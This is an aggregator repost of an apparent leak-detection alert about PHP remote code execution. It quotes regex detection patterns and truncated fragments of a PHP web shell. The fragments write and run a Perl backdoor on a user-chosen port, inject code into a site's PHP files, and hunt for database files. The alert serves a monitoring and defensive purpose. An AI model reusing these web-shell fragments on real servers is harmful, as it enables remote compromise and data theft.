Quantcast
Channel: Obfuscated PHP Code – LeakedIn
Viewing all articles
Browse latest Browse all 222

Potential leak of data: PHP Remote Code Execution

$
0
0
Detected 8 occurrence(s) of ‘\s+(system|popen|shellexec|exec).*\$(_GET|_POST|_COOKIE|_REQUEST|HTTP_POST_VARS)’: t'> Port: <input type='text' name='port'> <input type='submit' name='backdoor_host' value='Backdoor'></center>"; } else { @$fh=fopen("shbd.pl","w"); @fwrite($fh,base64_decode($backdoor_perl)); @fclose($fh); execmd("perl shbd.pl $_POST[port]",$disable); echo "Server backdoor'd</br>"; } } function sql_rep_search($dir) { global $self; $ext=array(".db",".sql"); @$dh=opendir($dir); while((@$file=readdir($dh))) { $ex=strrchr($file,'.'); Detected 1 occurrence(s) of ‘\?php.*(eval|urldecode)\(.*\>’: T['files'] as $file) { $ext=strrchr($file,'.'); if($ext!=".php") continue; @$fh=fopen($file,'a'); if(@is_resource($fh)) { $success++; @fwrite($fh,"<?php […]

Viewing all articles
Browse latest Browse all 222

Trending Articles